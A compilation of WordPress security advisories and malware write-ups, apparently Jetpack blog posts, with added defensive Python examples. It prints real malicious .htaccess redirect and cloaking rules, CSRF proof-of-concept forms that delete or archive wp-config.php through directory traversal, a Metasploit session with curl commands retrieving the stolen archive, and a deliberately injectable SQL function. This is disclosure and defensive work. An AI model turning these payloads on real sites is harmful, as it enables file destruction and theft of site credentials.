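    The escaping-context problem described above, shown as an added example beside its fix. This is not code from Paid Memberships Pro or from the advisory: it uses Python's sqlite3 with a constructed memberships table standing in for $wpdb->pmpro_memberships_users, and a quote-escaping helper that plays the role of esc_sql(). The table layout, the sample rows and the function names are all assumptions. The hardened variant does what $wpdb->prepare() with one %d per list element would do in WordPress: it allow-lists the level ids as integers and binds each one with a placeholder, so the values never reach the SQL text at all.

```python
import sqlite3


def make_db():
    """Constructed sample table (an assumption standing in for the real memberships table)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE memberships (id INTEGER, user_id INTEGER, membership_id INTEGER, status TEXT);
        INSERT INTO memberships VALUES (1, 7, 2, 'active'), (2, 9, 3, 'active'), (3, 7, 5, 'expired');
    """)
    return db


def escape_quotes(value):
    """Quote escaping in the spirit of esc_sql(): it neutralises quotes inside a string
    literal, but it cannot help a value that is spliced into a bare IN(...) list."""
    return str(value).replace("\\", "\\\\").replace("'", "''")


def vulnerable_query(db, levels, user_id):
    """Mirrors the flawed pattern: escaped values concatenated outside of any quotes."""
    in_list = ",".join(escape_quotes(level) for level in levels)
    sql = ("SELECT user_id, membership_id FROM memberships WHERE status = 'active' "
           f"AND membership_id IN({in_list}) AND user_id = '{escape_quotes(user_id)}'")
    return db.execute(sql).fetchall()


def hardened_query(db, levels, user_id):
    """The fix: only integer ids are accepted, and every one is bound with a placeholder."""
    if not levels:
        raise ValueError("at least one membership level is required")
    ints = []
    for level in levels:
        if not str(level).isdigit():
            raise ValueError(f"membership level {level!r} is not an integer id")
        ints.append(int(level))
    placeholders = ",".join("?" * len(ints))
    sql = ("SELECT user_id, membership_id FROM memberships WHERE status = 'active' "
           f"AND membership_id IN({placeholders}) AND user_id = ?")
    return db.execute(sql, (*ints, int(user_id))).fetchall()


def compare(levels, user_id):
    """Run both variants on the same input; returns (vulnerable result, hardened result)."""
    db = make_db()
    vulnerable = vulnerable_query(db, levels, user_id)
    try:
        hardened = hardened_query(db, levels, user_id)
    except ValueError as exc:
        hardened = f"rejected: {exc}"
    return vulnerable, hardened
```

    With a well-formed level list both variants return the same single row for the current user. With a quote-free level value the vulnerable variant happily appends whatever SQL it is handed, while the hardened variant rejects the value before any query is built, which is the behaviour a shortcode attribute reachable by subscribers needs.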

    Conclusion

    We recommend that you check which version of the plugins your site is using, and if they are within the affected ranges, update them as soon as possible! 

    At Jetpack, we work hard to make sure your websites are protected from these types of vulnerabilities. We recommend that you have a security plan for your site that includes malicious file scanning and backups. Jetpack Security is one great WordPress security option to ensure your site and visitors are safe.

    Credits

    Original researcher: Marc Montpas

    Thanks to the rest of the WPScan team for feedback, help, and corrections.

  • How Malware Can Abuse the .htaccess File

    You learned about the importance of the .htaccess file in our blog post How to Access and Edit the Default WordPress .htaccess File. As you can imagine, an important file such as .htaccess can be a target for bad actors. In this article, we’ll point out cases and indicators of compromise that affect this file.

    Malicious redirects

    Attackers can set up redirects in the .htaccess file that redirect visitors based on specific conditions. The final destination can be a website containing other malicious content, spam, phishing campaigns, or other types of scam.

    Those redirects rely on the RewriteRule directive and are sometimes preceded by conditions set with RewriteCond, just as a default .htaccess file would have. This can make the malicious rules hard to spot for users who aren’t familiar with the website’s configuration.

    Examples of this type of malware are (URLs were invalid):

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
    RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
    RewriteRule ^.*$ hxxp://celeirodoalgarvio[.]com/azzf.html?h=717013 [L,R]
    </IfModule>
    
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteRule ^([A-Za-z0-9-]+).txt$ hxxps://getyourprizenow[.]life/?u=y2ykaew&o=2xup89r&m=1&t=m2rdhta [L]
    RewriteRule ^([A-Za-z0-9-]+).htm$ hxxps://getyourprizenow[.]life/?u=y2ykaew&o=2xup89r&m=1&t=m2rdhta [L]
    </IfModule>
    
    RewriteEngine on
    RewriteCond %{HTTP_USER_AGENT} "iPhone|android"[NC]
    RewriteRule ^(.*)$ hxxp://176[.]102[.]34[.]137/safezone [L,R=302]
    

    SEO spam

    Very similar to the malicious redirects case, this bad code will target search engines instead of the end user, redirecting their crawling attempts to malicious pages written to boost other websites, usually related to scams.

    The conditions look for search engines in the referrer and user-agent headers, as in the following example:

    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [NC,OR]
    RewriteCond %{HTTP_REFERER} (yahoo|bing|google|msn|aol)
    RewriteRule ^(.*)$ default.php [L,QSA]
    RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [NC,OR]
    RewriteCond %{HTTP_REFERER} (yahoo|bing|google|msn|aol)
    RewriteRule ^(.*)$ inc.php [L,QSA]
    RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [OR,NC]
    RewriteCond %{HTTP_REFERER} (yahoo|bing|google|msn|aol)
    RewriteRule ^(.*)$ inc.php [L,QSA] 
    RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [OR,NC] 
    RewriteCond %{HTTP_REFERER} (bing|google|yahoo|msn|aol)
    RewriteRule ^(.*)$ inc.php [L,QSA]
    

    Allowing bad code

    Sometimes the attacker wants to protect the malicious file they uploaded to the site from competitors or other people poking around. Or they want to make sure their malicious file will be served, overriding the parent directory’s configuration.

    For those cases a FilesMatch condition will be created and specific files or extensions will be listed, as in the example below:

    <FilesMatch ".(py|exe|php)$">
     Order allow,deny
     Deny from all
    </FilesMatch>
    <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php)$">
     Order allow,deny
     Allow from all
    </FilesMatch>
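    The three indicators above (external redirects, search-engine cloaking conditions and FilesMatch blocks that re-allow PHP) can be checked for mechanically. The following scanner is an added example and not a Jetpack or WPScan tool: it walks an .htaccess file line by line, remembers the RewriteCond lines that belong to the next RewriteRule, tracks whether it is inside a FilesMatch block, and reports a finding for each indicator. The sample .htaccess is constructed from the patterns shown on this page (with a defanged RFC 5737 address in place of a real host), and the site hostname, regexes and finding texts are assumptions.

```python
import re
from dataclasses import dataclass

# Search-engine names that cloaking rules key on (extend as needed).
SEARCH_ENGINES = re.compile(r"\b(bing|google|yahoo|msn|aol|yandex|baidu|duckduck)\w*", re.I)
# Absolute URL targets; "hxxp" is accepted so defanged samples can be scanned too.
EXTERNAL_TARGET = re.compile(r"^(?:https?|hxxps?)://([^/?#]+)", re.I)
FILESMATCH_OPEN = re.compile(r'<FilesMatch\s+"([^"]+)"', re.I)
ALLOW_ALL = re.compile(r"(allow\s+from\s+all|require\s+all\s+granted)", re.I)


@dataclass
class Finding:
    line: int
    reason: str
    text: str


def scan_htaccess(text, site_host):
    """Return a Finding per indicator; site_host is the site's own host, so redirects to it are fine."""
    site_host = site_host.lower()
    findings = []
    pending_conds = []      # RewriteCond lines that apply to the next RewriteRule
    open_filesmatch = None  # (line number, pattern) while inside a <FilesMatch> block
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        lower = line.lower()
        if lower.startswith("rewritecond"):
            pending_conds.append((number, line))
            continue
        if lower.startswith("rewriterule"):
            parts = line.split()
            target = parts[2] if len(parts) > 2 else ""
            host_match = EXTERNAL_TARGET.match(target)
            if host_match:
                host = host_match.group(1).lower()
                if host != site_host and not host.endswith("." + site_host):
                    findings.append(Finding(number, "RewriteRule sends visitors to an external host", line))
            for cond_number, cond in pending_conds:
                if re.search(r"HTTP_(USER_AGENT|REFERER)", cond, re.I) and SEARCH_ENGINES.search(cond):
                    findings.append(Finding(cond_number, "RewriteCond keys on a search-engine user-agent or referrer", cond))
            pending_conds = []
            continue
        match = FILESMATCH_OPEN.match(line)
        if match:
            open_filesmatch = (number, match.group(1))
            continue
        if lower.startswith("</filesmatch"):
            open_filesmatch = None
            continue
        if open_filesmatch and ALLOW_ALL.match(line) and "php" in open_filesmatch[1].lower():
            findings.append(Finding(open_filesmatch[0], "<FilesMatch> block explicitly allows PHP files", open_filesmatch[1]))
    return findings


# Constructed sample: the stock WordPress block followed by one of each indicator type.
SAMPLE_HTACCESS = """\
# BEGIN WordPress (legitimate default rules, left alone by the scanner)
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
RewriteCond %{HTTP_USER_AGENT} "iPhone|android" [NC]
RewriteRule ^(.*)$ hxxp://198[.]51[.]100[.]7/safezone [L,R=302]
RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [NC,OR]
RewriteCond %{HTTP_REFERER} (yahoo|bing|google|msn|aol)
RewriteRule ^(.*)$ inc.php [L,QSA]
<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|lock360.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
"""


def demo():
    return scan_htaccess(SAMPLE_HTACCESS, "example.com")
```

    The scanner is a triage aid, not a verdict: a legitimate bot-blocking rule that names Google will be reported just like a cloaking rule, so each finding still needs to be read against what the site owner actually configured. The stock WordPress rules produce no findings because their targets are local and their conditions only test REQUEST_FILENAME.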
    

    What to do if my site was infected?

    If you find that the .htaccess file on your website was compromised, the first thing you should do is restore it to a working version, which will preserve your site’s permalinks and redirects. Please refer again to How to Access and Edit the Default WordPress .htaccess File. Then follow these steps:

    • Change all admin users’ passwords and make sure you’re using multi-factor authentication.
    • Review all WordPress users and remove the ones you don’t recognize (especially the admin ones).
    • Review for unused or unknown themes and plugins and remove anything unnecessary or unknown.
    • Reinstall all your plugins since they may have been compromised.
    • Review your theme for added or changed files that weren’t added or changed with your consent.
    • Reinstall WordPress core files.

    At Jetpack, we work hard to make sure your websites are protected from these types of vulnerabilities. We recommend that you have a security plan for your site that includes malicious file scanning and backups. The Jetpack Security bundle is one great WordPress security option to ensure your site and visitors are safe. This product includes real-time malware scanning, site backups, comment and form spam protection from Akismet, brute force attack protection, and more.

  • Fake plugin wave affecting WordPress sites

    Recently our colleague Joshua Goode escalated to the Security Research team an investigation he was performing on several websites that presented the same indicators of compromise. There were small variations in what the final payload was, but the attack timeline was always the same.

    Attack timeline

    As Joshua initially pointed out, and as I subsequently confirmed, the chain starts with the installation of the core-stab plugin, followed by other additional items. The following timeline depicts one of the many compromised sites we reviewed:

    • Jan 10, 2023 @ 17:29:49.587 UTC – core-stab plugin upload – /wp-admin/update.php?action=upload-plugin
    • Jan 10, 2023 @ 17:29:52.270 – /wp-content/plugins/core-stab/index.php
    • Jan 11, 2023 @ 02:12:50.773 – /wp-admin/theme-install.php?tab=upload
    • Jan 11, 2023 @ 02:12:57.862 – Classic theme upload – /wp-content/themes/classic/inc/index.php
    • Jan 11, 2023 @ 03:37:58.870 – Another core-stab install
    • Jan 11, 2023 @ 04:15:06.014 – Installation of a new plugin, task-controller: /wp-content/plugins/task-controller/index.php
    • Jan 11, 2023 @ 08:23:26.519 – Installation of WP File Manager (unsure if by the attacker, but this plugin typically accompanies a lot of malware)

    The most common “coincidence” is that all users involved in this attack had their emails listed on at least one public password leak since 2019, which only corroborates the overall findings: the attacker(s) used compromised or leaked accounts to install the malware.

    You can find more details on how the core-stab malware works, as well as detailed detection and blocking information for WP security experts, via WPScan.
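    The timeline above has a shape that can be hunted for in web server access logs: a hit on a plugin or theme upload endpoint, followed shortly by the first ever request to a plugin or theme slug the site did not have before. The detector below is an added example, not a Jetpack tool. It parses combined-format log lines, collects the upload events, and reports every previously unseen slug under wp-content whose first request falls within a window after an upload. The log lines are constructed to mirror the timeline above (with RFC 5737 addresses), and the endpoint list, the two-hour window and the allow-list of known slugs are assumptions.

```python
import re
from datetime import datetime, timedelta

# Combined-log-format prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Admin endpoints involved in uploading a plugin or theme archive (assumed list).
UPLOAD_ENDPOINTS = (
    "/wp-admin/update.php?action=upload-plugin",
    "/wp-admin/update.php?action=upload-theme",
    "/wp-admin/theme-install.php?tab=upload",
)
# The first path component under wp-content/plugins or wp-content/themes is the slug.
CODE_PATH_RE = re.compile(r"^/wp-content/(plugins|themes)/([A-Za-z0-9_-]+)/")


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_upload_chains(lines, known_slugs, window=timedelta(hours=2)):
    """Flag slugs whose first request follows an upload-endpoint hit within the window."""
    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e["ts"])
    uploads = [e for e in events if any(e["path"].startswith(u) for u in UPLOAD_ENDPOINTS)]
    seen, alerts = set(), []
    for event in events:
        m = CODE_PATH_RE.match(event["path"])
        if not m:
            continue
        kind, slug = m.groups()
        if slug in known_slugs or slug in seen:
            continue
        seen.add(slug)
        preceding = [u for u in uploads if timedelta(0) <= event["ts"] - u["ts"] <= window]
        if preceding:
            upload = preceding[-1]  # the most recent upload before the first request
            alerts.append({
                "kind": kind,
                "slug": slug,
                "first_request": event["ts"].isoformat(),
                "upload_at": upload["ts"].isoformat(),
                "upload_from": upload["ip"],
            })
    return alerts


# Constructed log lines modelled on the timeline above; addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2023:17:29:49 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 302 0
203.0.113.5 - - [10/Jan/2023:17:29:52 +0000] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 200 512
198.51.100.9 - - [10/Jan/2023:18:00:00 +0000] "GET /wp-content/plugins/akismet/_inc/akismet.js HTTP/1.1" 200 4096
203.0.113.5 - - [11/Jan/2023:02:12:50 +0000] "POST /wp-admin/theme-install.php?tab=upload HTTP/1.1" 302 0
203.0.113.5 - - [11/Jan/2023:02:12:57 +0000] "GET /wp-content/themes/classic/inc/index.php HTTP/1.1" 200 128
203.0.113.5 - - [11/Jan/2023:04:15:06 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 302 0
203.0.113.5 - - [11/Jan/2023:04:15:09 +0000] "GET /wp-content/plugins/task-controller/index.php HTTP/1.1" 200 64
"""


def demo():
    return find_upload_chains(SAMPLE_LOG.splitlines(), {"akismet", "jetpack"})
```

    Feed it the real access log together with the slugs of the plugins and themes you know you installed, and every alert is a slug that appeared right after someone used the upload screens; pair the reporting address with the authenticated user in the WordPress audit log to see whose account did it.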


    What to do if my site was infected?

    If you find the core-stab plugin installed on your site, the first thing you should do is remove it and then follow these next steps:

    • Change all admin users’ passwords and make sure you’re using multi-factor authentication.
    • Review all WordPress users and remove the ones you don’t recognize (especially the admin ones).
    • Review for unused or unknown themes and plugins and remove anything unnecessary or unknown.
    • Reinstall all your plugins since they may have been compromised.
    • Review your theme for added or changed files that weren’t added or changed with your consent.
    • Reinstall WordPress core files.

    Finally, at Jetpack, we work hard to make sure your websites are protected from these types of vulnerabilities. We recommend that you have a security plan for your site that includes malicious file scanning and backups. The Jetpack Security bundle is one great WordPress security option to ensure your site and visitors are safe. This product includes real-time malware scanning, site backups, comment and form spam protection from Akismet, brute force attack protection, and more.

  • Vulnerabilities Found in the 3DPrint Premium Plugin

    The premium version of the WordPress plugin 3DPrint is vulnerable to Cross Site Request Forgery (CSRF) and directory traversal attacks when the file manager functionality is enabled. These vulnerabilities allow an attacker to delete or get access to arbitrary files and directories on the affected sites, including sensitive files like the site configuration files, which in turn could lead to a full site takeover.

    Recently, while looking over some potential false positives flagged by our experimental signatures, we discovered some code that puzzled us in the 3DPrint premium plugin.

    require_once("../../../../../../wp-load.php");
    if ( !current_user_can('administrator') ) exit;
    $p3d_settings = get_option( 'p3d_settings' );
    
    global $wpdb;
    
    set_time_limit(0);
    ini_set( 'memory_limit', '-1' );
    

    This snippet was found in the Tiny File Manager PHP module located within the include directory of the plugin, but is not found in the original Tiny File Manager project. It seems to be injected with the intention to integrate it with the WordPress role-based access controls. 

    Loading WordPress code files like this in an unrelated module is usually a sign that something is a bit off, so we decided to investigate further.

    The observant reader will notice that access to the module is limited to users with the Administrator role, but there are no nonce checks. That would be ok if Tiny File Manager had its own CSRF protection, but as this was not the case, it looks like this code may be susceptible to a CSRF attack. (Tiny File Manager has since added CSRF protection after we made them aware of the issue. Version 2.5.0 and later should be a lot safer to use!)

    A complicating factor is that Tiny File Manager is not included in the package when installing 3DPrint premium but is downloaded on demand when activated. The version downloaded at the time of writing is version 2.4.4, but it has been heavily modified by the 3DPrint developers, and is downloaded from their domain, not directly from the Tiny File Manager repositories.

    Most of the changes made remove functionality not used by the plugin, as well as a few other changes, like hard-coding the path, limiting what the file manager should be able to access. In addition, the authentication and authorization features built into Tiny File Manager have been disabled and replaced by the above integration with the WordPress role system.

    We have discovered a couple of vulnerabilities where the combination of the modified access controls and inclusion of the Tiny File Manager in the 3DPrint plugin becomes exploitable to an outside attacker. This includes deleting or downloading sensitive files, potentially allowing for a full site takeover. These vulnerabilities exploit the lack of nonce checks in the modified access controls, along with directory traversal vulnerabilities in Tiny File Manager itself.

    We have tried to contact the vendor of both the 3DPrint plugin and the Tiny File Manager project. Of these, only the developers of the Tiny File Manager project have responded to us and fixed the issues we submitted to them.

    Check out our new WAF as part of Jetpack Scan, which will protect against these attacks out of the box. It’s currently in beta. Jetpack Scan will also detect the vulnerable component, and help with removing it.

    As the Tiny File Manager module is downloaded and installed on demand, there’s not necessarily a correspondence between the plugin version and the version of Tiny File Manager being used. However, once installed, there does not seem to be an easy way to update the Tiny File Manager module apart from manually deleting it and activating it again.

    For this reason, we consider all versions of 3DPrint to be vulnerable to the below vulnerabilities if the file manager has been activated.

    The vulnerabilities

    1. CSRF leading to arbitrary file/directory deletion

    The mass delete functionality in the included version of Tiny File Manager (version 2.4.4) is not properly protected against directory traversal and also lacks CSRF protections. This allows an attacker to trick an admin into deleting multiple files or even directories on the server recursively. 

    // Mass deleting
    if (isset($_POST['group'], $_POST['delete']) && !FM_READONLY) {
        $path = FM_ROOT_PATH;
        if (FM_PATH != '') {
    //        $path .= '/' . FM_PATH;
        }
    
        $errors = 0;
        $files = $_POST['file'];
        if (is_array($files) && count($files)) {
            foreach ($files as $f) {
                if ($f != '') {
                    $new_path = $path . '/' . $f;
                    if (!fm_rdelete($new_path)) {
                        $errors++;
                    }
                }
            }
            if ($errors == 0) {
                fm_set_msg('Selected files and folder deleted');
            } else {
                fm_set_msg('Error while deleting items', 'error');
            }
        } else {
            fm_set_msg('Nothing selected', 'alert');
        }
    
        fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH));
    }
    

    This can be exploited by setting the group and delete POST parameters to any value and passing an array of files or directories to delete in the file parameter. The variable $new_path is a simple concatenation of FM_ROOT_PATH and the passed-in filename, which is then handed to the recursive delete function fm_rdelete(). As fm_rdelete() does not validate the pathnames it’s given, this code is vulnerable to a directory traversal attack.

    Here’s an example proof of concept: 

    <form action="https://example.com/wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php" method="POST">
        <input type="hidden" name="group" value="1">
        <input type="hidden" name="delete" value="1">
        <input type="hidden" name="file[1]" value="../2020">
        <input type="hidden" name="file[2]" value="../../../wp-config.php">
        <input type="submit" value="Get rich!">
    </form>
    

    All paths are relative to the wp-content/uploads/p3d/ directory on the server. When any logged-in admin clicks the button to get rich, their uploads from 2020 are deleted along with the site’s wp-config.php file.

    2. CSRF leading to arbitrary downloads

    The functionality in the included version of Tiny File Manager (version 2.4.4) to download a zip or tar archive of selected files is not protected against directory traversal and lacks CSRF protections. This allows an attacker to trick an admin into creating a zip or tar archive with arbitrary files and directories from the site, including configuration files or other sensitive content.

    The archive is placed in the normal 3DPrint upload directory, wp-content/uploads/p3d/. The file name is only partially controllable by the attacker but is predictable enough that it should be relatively easy to brute force. If they know at what time the forged request was sent, it should also be trivial to make an educated guess.

    // Pack files
    if (isset($_POST['group']) && (isset($_POST['zip']) || isset($_POST['tar'])) && !FM_READONLY) {
        $path = FM_ROOT_PATH;
        $ext = 'zip';
        if (FM_PATH != '') {
    //        $path .= '/' . FM_PATH;
        }
    
        //set pack type
        $ext = isset($_POST['tar']) ? 'tar' : 'zip';
    
        $files = $_POST['file'];
        if (!empty($files)) {
            chdir($path);
    
            if (count($files) == 1) {
                $one_file = reset($files);
                $one_file = basename($one_file);
                $zipname = $one_file . '_' . date('ymd_His') . '.'.$ext;
            } else {
                $zipname = 'archive_' . date('ymd_His') . '.'.$ext;
            }
    
            if($ext == 'zip') {
                $zipper = new FM_Zipper();
                $res = $zipper->create($zipname, $files);
            } elseif ($ext == 'tar') {
                $tar = new FM_Zipper_Tar();
                $res = $tar->create($zipname, $files);
            }
    

    Sending a POST request with the group parameter and either the zip or tar parameter set to any value creates an archive of the files specified in the file parameter. The current date and time are appended to the archive’s file name, which has the same base name as the archived file, or “archive” if several files are archived together. The archive is created in the 3DPrint upload directory, but the path names of the files are not sanitized and can point outside this directory, making this vulnerable to directory traversal attacks.
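    Both vulnerabilities above come down to the same two missing checks: the request is never tied to the admin’s session (no nonce), and the file[] entries are joined onto FM_ROOT_PATH without ever confirming the result stays inside it. The following is an added example of those two checks, written in Python rather than as a patch to Tiny File Manager or 3DPrint, and it is not code from either project. resolve_within() fully resolves both the root and the candidate path (so “../2020”, absolute paths and symlinks that point outside are all refused, and the root itself is never a valid target for a mass delete), partition_request() applies it to a file[] list, and the token helpers show the session-bound check a nonce provides. The temporary directory layout, file names and secret are constructed for the demonstration.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path


class UnsafePath(ValueError):
    """Raised when a user-supplied path would leave the allowed root."""


def resolve_within(root, user_path):
    """Resolve user_path against root and refuse anything that escapes it.

    Both sides are resolved (symlinks included) before comparison, so '../x',
    absolute paths and symlinks pointing outside the root are all rejected.
    The root itself is rejected too: a mass delete must never target it.
    """
    root_real = Path(root).resolve()
    candidate = root_real.joinpath(user_path).resolve()
    if root_real not in candidate.parents:
        raise UnsafePath(f"{user_path!r} resolves outside {root_real}")
    return candidate


def partition_request(root, files):
    """Split a file[] request into paths that are safe to act on and paths to refuse."""
    allowed, rejected = [], []
    for name in files:
        if not name:
            continue
        try:
            allowed.append(resolve_within(root, name))
        except UnsafePath:
            rejected.append(name)
    return allowed, rejected


def make_csrf_token(secret, session_id):
    """Bind a token to the session; the form must echo it back, as a WordPress nonce does."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(secret, session_id, presented):
    """Constant-time comparison; a missing or foreign-session token fails."""
    return hmac.compare_digest(make_csrf_token(secret, session_id), presented or "")


def demo():
    """Apply the containment check to the kinds of file[] values shown in the proof of concept."""
    with tempfile.TemporaryDirectory() as tmp:
        root = (Path(tmp) / "uploads" / "p3d").resolve()   # assumed upload root
        (root / "2020").mkdir(parents=True)
        (root / "2020" / "model.stl").write_text("solid model")
        requested = ["2020", "2020/model.stl", "../2020", "../../../wp-config.php", "2020/../../secret"]
        allowed, rejected = partition_request(root, requested)
        return [p.relative_to(root).as_posix() for p in allowed], rejected
```

    In the file manager’s own terms, the delete and pack handlers would run the equivalent of partition_request() on $_POST['file'] and act only on the allowed list, and the form would carry a token that verify_csrf_token() checks before either branch is entered; that combination blocks both the forged request and the traversal in the same place.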

    To exploit this vulnerability, we created a simple payload module for Metasploit that serves a self-submitting form carrying the malicious payload to the vulnerable site. The proof of concept payload sent was:

    <!DOCTYPE html>
    <html>
      <body>
        <form action="https://3dprint-test.ddev.site/wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php" method="POST">
          <input type="hidden" name="group" value="1">
          <input type="hidden" name="zip" value="1">
          <input type="hidden" name="file[1]" value="../2022">
          <input type="hidden" name="file[2]" value="../../../wp-config.php">
        </form>
        <script>document.forms[0].submit()</script>
      </body>
    </html>
    

    As the Metasploit module would record the timestamp of when the form was sent, that made it easy to guess the correct filename for the archive created.

    % msfconsole                                                                                
                                                      
    msf6 > use payload/html/html_reverse_http
    msf6 payload(html/html_reverse_http) > set LHOST localhost
    LHOST => localhost
    msf6 payload(html/html_reverse_http) > set LURI /
    LURI => /
    msf6 payload(html/html_reverse_http) > set PAYLOADFILE ../poc/poc-csrf-archive.html
    PAYLOADFILE => ../poc/poc-csrf-archive.html
    msf6 payload(html/html_reverse_http) > to_handler
    [*] Payload Handler Started as Job 0
    [*] Started HTTP reverse handler on http://[::1]:8080/
    [*] http://localhost:8080/ handling request from ::1; (UUID: rhexpfwi) Request processed at 2022-12-10T11:06:49+01:00
    
    msf6 payload(html/html_reverse_http) > exit
    
    % curl -I 'https://3dprint-test.ddev.site/wp-content/uploads/p3d/archive_221210_100649.zip'
    HTTP/2 200 
    server: nginx/1.20.1
    date: Sat, 10 Dec 2022 10:07:35 GMT
    content-type: application/zip
    content-length: 87225
    last-modified: Sat, 10 Dec 2022 10:06:49 GMT
    etag: "63945a39-154b9"
    accept-ranges: bytes
    
    
    % curl -O 'https://3dprint-test.ddev.site/wp-content/uploads/p3d/archive_221210_100649.zip'
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100 87225  100 87225    0     0  2322k      0 --:--:-- --:--:-- --:--:-- 2366k
    
    % unzip -v archive_221210_100649.zip 
    Archive:  archive_221210_100649.zip
     Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
    --------  ------  ------- ---- ---------- ----- --------  ----
           0  Stored        0   0% 2022-12-10 10:06 00000000  ../2022/
           0  Stored        0   0% 2022-12-10 10:06 00000000  ../2022/12/
       85888  Defl:X    85655   0% 2022-12-10 10:05 724f1f67  ../2022/12/funny-cat.jpg
        1955  Defl:X     1114  43% 2022-11-01 23:25 96f2088a  ../../../wp-config.php
    --------          -------  ---                            -------
       87843            86769   1%                            4 files
    

    Notice how we can deduce the filename of the generated archive from the timestamp of the request. In this case, the server container is running one timezone behind the local timezone.

    Recommendations

    As the version of the file manager installed is independent of the version of the plugin installed, we cannot recommend a fixed version of the plugin. 

    Neither have we found an easy way to update the file manager module if a new version is released at a later date.

    For this reason, we consider all versions of the 3DPrint premium plugin vulnerable if the file manager component is enabled.

    Our recommendation is to make sure the file manager module is disabled, and that the file is removed from the site.

    The easiest way is to delete the file wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php if it exists.

    Conclusions

    All versions of the 3DPrint premium plugin are vulnerable to CSRF and directory traversal attacks if the file manager module is enabled on the site. This does not affect the free version of the plugin downloaded from the WordPress.org plugin repository.

    At Jetpack, we work hard to make sure your websites are protected from these types of vulnerabilities. We recommend that you have a security plan for your site that includes malicious file scanning and backups. The Jetpack Security bundle is one great WordPress security option to ensure your site and visitors are safe. This product includes real-time malware scanning, site backups, comment and form spam protection from Akismet, brute force attack protection, and more.

    Credits

    Research by Harald Eilertsen, with feedback and corrections provided by Benedict Singer, Rob Pugh, Jen Swisher and the Jetpack Scan team.

    Timeline

    • 2022-09-08: We were made aware of the finding and started investigating
    • 2022-10-25: Contacted vendor first time
    • 2022-11-01: Vendor contacted second time through a different channel
    • 2022-11-08: Mass delete vulnerability disclosed (CVE-2022-3899)
    • 2022-11-15: Contacted developers of Tiny File Manager about lack of CSRF protection, and directory traversal vulnerabilities.
    • 2022-11-19: Tiny File Manager 2.5.0 released, fixing CSRF issues but not the directory traversal problems.
    • 2022-12-13: Public disclosure